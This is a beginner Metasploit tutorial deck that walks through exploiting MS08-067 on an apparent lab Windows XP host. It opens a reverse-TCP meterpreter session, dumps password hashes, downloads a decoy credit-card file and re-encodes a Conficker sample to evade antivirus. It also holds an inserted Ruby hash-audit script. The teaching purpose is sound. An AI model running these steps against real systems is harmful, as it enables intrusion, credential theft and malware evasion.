
Metasploit 101

By: Metacortex For:


Audience:

- People who haven't used Metasploit before or don't know what it is

- People looking to maybe learn some new features of metasploit

- Nubs


What is Metasploit?

Metasploit is an exploitation framework: an all-in-one toolkit covering what pentesters, researchers, and exploit developers need.

Written in Ruby

Open Source

Highly extensible and customizable

Originally written by HD Moore

Maintained by Rapid7 Developers


Getting Metasploit

Best way to get a hold of it is to grab it off SVN

Available already installed in BackTrack

Can download pre-packaged versions


Linux Prerequisites

To run Metasploit, you need Ruby and Rubygems.

dc@801:~/metasploit$ sudo aptitude install ruby rubygems
The following NEW packages will be installed:
  libruby1.8{a} ruby ruby1.8{a} ruby1.8-dev{a} rubygems rubygems1.8{a}
0 packages upgraded, 6 newly installed, 0 to remove and 0 not upgraded.
Need to get 2,622 kB of archives. After unpacking 11.0 MB will be used.
Do you want to continue? [Y/n/?] y

SVN Download

dc@801:~/metasploit$ svn co https://www.metasploit.com/svn/framework3/trunk/
A    trunk/msfelfscan
A    trunk/scripts
A    trunk/scripts/ps
A    trunk/scripts/ps/msflag.ps1
A    trunk/scripts/resource
A    trunk/documentation/rpm
A    trunk/documentation/rpm/metasploit.spec
 U   trunk
Checked out revision 15702.

SVN Update

dc@801:~/metasploit/trunk$ svn update
U    external/source/meterpreter/source/extensions/priv/server/priv.c
U    external/source/meterpreter/source/extensions/stdapi/server/stdapi.c
U    external/source/meterpreter/source/extensions/stdapi/server/net/config/interface.c
U    HACKING
D    documentation/users_guide.pdf
A    documentation/Gemfile
A    documentation/users_guide_4.2.pdf
A    documentation/users_guide_4.3.pdf
Updated to revision 15703.

Download binaries

Do that at

http://www.metasploit.com/download/


What do you get?

dc@801:~/metasploit/trunk$ ls
armitage       HACKING     msfd         msfpescan  plugins         tools
COPYING        lib         msfelfscan   msfrop     README.md
data           modules     msfencode    msfrpc     scripts
documentation  msfbinscan  msfgui       msfrpcd    spec
external       msfcli      msfmachscan  msfupdate  test
Gemfile        msfconsole  msfpayload   msfvenom   THIRD-PARTY.md

A whole lot of stuff

msfconsole

But we are really interested in msfconsole


msfconsole

dc@801:~/metasploit/trunk$ sudo ./msfconsole
[sudo] password for dc:

(ASCII-art "MSF" banner)

       =[ metasploit v4.4.0-release [core:4.4 api:1.0]
+ -- --=[ 922 exploits - 496 auxiliary - 150 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
       =[ svn r15704 updated today (2012.08.04)

msf >

msfconsole help

msf > help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    back          Move back from the current context
    banner        Display an awesome metasploit banner
    cd            Change the current working directory
    color         Toggle color
    connect       Communicate with a host
    exit          Exit the console
    help          Help menu
    info          Displays information about one or more module
    irb           Drop into irb scripting mode
    jobs          Displays and manages jobs

msfconsole search

msf > search ms08_067

Matching Modules
================

   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Microsoft Server Service Relative Path Stack Corruption

Nmap

msf > nmap -A 192.168.0.107
[*] exec: nmap -A 192.168.0.107

Starting Nmap 5.21 ( http://nmap.org ) at 2012-08-04 00:51 MDT
Nmap scan report for 192.168.0.107
Host is up (0.00033s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:35:04:D6 (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
Network Distance: 1 hop
Service Info: OS: Windows

Exploits and Payloads

Exploit: Code that leverages a certain vulnerability

Payload: Code that gets placed on the system post exploitation


Selecting an Exploit

Once you have identified a vulnerability that has an exploit in Metasploit, let's go ahead and use it.

In this example, we are going against a fresh install of Windows XP SP2

XP SP2 is notorious for MS08-067 (the bug Conficker used)

MS08-067 is a very reliable exploit, so we will use it


Exploit Options

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

   Id  Name
   --  ----

Available Payloads

msf exploit(ms08_067_netapi) > show payloads

Compatible Payloads
===================

   Name                                    Disclosure Date  Rank    Description
   ----                                    ---------------  ----    -----------
   generic/custom                                           normal  Custom Payload
   generic/debug_trap                                       normal  Generic x86 Debug Trap
   generic/shell_bind_tcp                                   normal
   [...]                                                            Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/vncinject/reverse_tcp                            normal  VNC Server (Reflective Injection), Reverse TCP Stager
   windows/vncinject/reverse_tcp_allports                   normal  VNC Server (Reflective Injection), Reverse All-Port TCP Stager

Select Payload

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

Show Exploit Options

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: process, none, seh, thread
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

Set Exploit Options

msf exploit(ms08_067_netapi) > set RHOST 192.168.0.107
RHOST => 192.168.0.107
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.101
LHOST => 192.168.0.101
msf exploit(ms08_067_netapi) > show options

Verify Options

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.0.107    yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: process, none, seh, thread
   LHOST     192.168.0.101    yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

EXPLOIT!

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.0.101:4444
[*] Automatically detecting the target
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability
[*] Sending stage (752128 bytes) to 192.168.0.107
[*] Meterpreter session 1 opened (192.168.0.101:4444 -> 192.168.0.107:1041) at Sat Aug 04 00:43:16 -0600 2012

meterpreter >

Basic Meterpreter

meterpreter > ifconfig

Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0

Interface  2
============
Name         : AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC : 08:00:27:35:04:d6
MTU          : 1500
IPv4 Address : 192.168.0.107
IPv4 Netmask : 255.255.255.0

Basic Meterpreter

meterpreter > hashdump
Administrator:500:52b7bd1c19ac445baad3b435b51404ee:d04b083dd7cbadb1f6abbca2d64222a5:::
dc801-1:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:acdfc6045fe025a3618e54ed631edee9:919ec17846e9c0392ff21e5f93eb60d4:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:2a19baf0800172a7622217c273064e3a:::
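As an added defender-side example (not code from the slides or from Metasploit), the following Ruby parses the pwdump-format lines that hashdump prints and flags what a host owner should fix: empty passwords, legacy LM hashes still being stored, passwords of 7 characters or fewer, and password reuse across accounts. The hash lines are the deck's lab values; the function and constant names are my own.

```ruby
# Added example: audit a meterpreter hashdump (pwdump format) for password-hygiene problems.
# Sample dump copied from the deck's lab output; not captured by this code.

# Well-known hashes of the empty password in each format.
EMPTY_LM = 'aad3b435b51404eeaad3b435b51404ee'
EMPTY_NT = '31d6cfe0d16ae931b73c59d7e0c089c0'

HASHDUMP = <<~DUMP
  Administrator:500:52b7bd1c19ac445baad3b435b51404ee:d04b083dd7cbadb1f6abbca2d64222a5:::
  dc801-1:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  HelpAssistant:1000:acdfc6045fe025a3618e54ed631edee9:919ec17846e9c0392ff21e5f93eb60d4:::
  SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:2a19baf0800172a7622217c273064e3a:::
DUMP

# Each line is user:rid:lm_hash:nt_hash::: ; malformed lines are skipped.
def parse_hashdump(text)
  text.each_line.map do |line|
    user, rid, lm, nt = line.strip.split(':')
    next unless lm && nt && lm.size == 32 && nt.size == 32
    { user: user, rid: rid.to_i, lm: lm.downcase, nt: nt.downcase }
  end.compact
end

# Returns { user => [finding symbols] } for every account in the dump.
def audit_hashes(entries)
  report = entries.map { |e| [e[:user], []] }.to_h
  by_nt = Hash.new { |h, k| h[k] = [] }
  entries.each do |e|
    report[e[:user]] << :empty_password if e[:nt] == EMPTY_NT
    if e[:lm] != EMPTY_LM
      # A real LM hash means the legacy format is still stored (NoLMHash is off).
      report[e[:user]] << :lm_hash_stored
      # LM hashes the two 7-character halves independently, so an "empty"
      # second half reveals a password of at most 7 characters.
      report[e[:user]] << :password_at_most_7_chars if e[:lm][16, 16] == EMPTY_LM[16, 16]
    end
    by_nt[e[:nt]] << e[:user]
  end
  # Identical NT hashes mean identical passwords (the empty-password group is already flagged).
  by_nt.each do |nt, users|
    next if nt == EMPTY_NT || users.size < 2
    users.each { |u| report[u] << :shared_password }
  end
  report
end

if $PROGRAM_NAME == __FILE__
  audit_hashes(parse_hashdump(HASHDUMP)).each { |u, f| puts "#{u}: #{f.empty? ? 'ok' : f.join(', ')}" }
end
```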

Basic Meterpreter

meterpreter > search -f *credit*
Found 2 results
    c:\\Documents and Settings\dc801-1\Desktop\CreditCardData.txt (16 bytes)
    c:\\Documents and Settings\dc801-1\Recent\CreditCardData.lnk (519 bytes)
meterpreter > cd C:\\
meterpreter > cd Documents\ and\ Settings
meterpreter > cd dc801-1
meterpreter > cd Desktop
meterpreter > ls

Listing: C:\Documents and Settings\dc801-1\Desktop
==================================================

Mode              Size  Type  Last modified                   Name
----              ----  ----  -------------                   ----
40777/rwxrwxrwx   0     dir   Sun Aug 05 13:07:32 -0600 2012  .
40777/rwxrwxrwx   0     dir   Sat Aug 04 00:18:30 -0600 2012  ..
100666/rw-rw-rw-  16    fil   Sun Aug 05 13:08:20 -0600 2012  CreditCardData.txt

meterpreter > download CreditCardData.txt
[*] downloading: CreditCardData.txt -> CreditCardData.txt
[*] downloaded : CreditCardData.txt -> CreditCardData.txt

Basic Meterpreter

dc@801:~/metasploit/trunk$ ls
armitage            HACKING     msfelfscan   msfrpc     spec
COPYING             lib         msfencode    msfrpcd    test
CreditCardData.txt  modules     msfgui       msfupdate  THIRD-PARTY.md
data                msfbinscan  msfmachscan  msfvenom   tools
documentation       msfcli      msfpayload   plugins
external            msfconsole  msfpescan    README.md
Gemfile             msfd        msfrop       scripts
dc@801:~/metasploit/trunk$ cat CreditCardData.txt
not really. lulz
dc@801:~/metasploit/trunk$

MSFEncode


dc@801:~/metasploit/trunk$ ./msfencode -i conficker.EXE -o notconficker.exe -e x86/shikata_ga_nai -c 10
[*] x86/shikata_ga_nai succeeded with size 86045 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 86074 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 86103 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 86132 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 86161 (iteration=5)
[*] x86/shikata_ga_nai succeeded with size 86190 (iteration=6)
[*] x86/shikata_ga_nai succeeded with size 86219 (iteration=7)
[*] x86/shikata_ga_nai succeeded with size 86248 (iteration=8)
[*] x86/shikata_ga_nai succeeded with size 86277 (iteration=9)
[*] x86/shikata_ga_nai succeeded with size 86306 (iteration=10)

MSFEncode file size jump

dc@801:~/metasploit/trunk$ ls -alh *conficker*
-rw-r--r-- 1 dc dc  84K 2012-08-29 13:23 conficker.EXE
-rw-r--r-- 1 dc dc 368K 2012-08-29 13:30 notconficker.exe
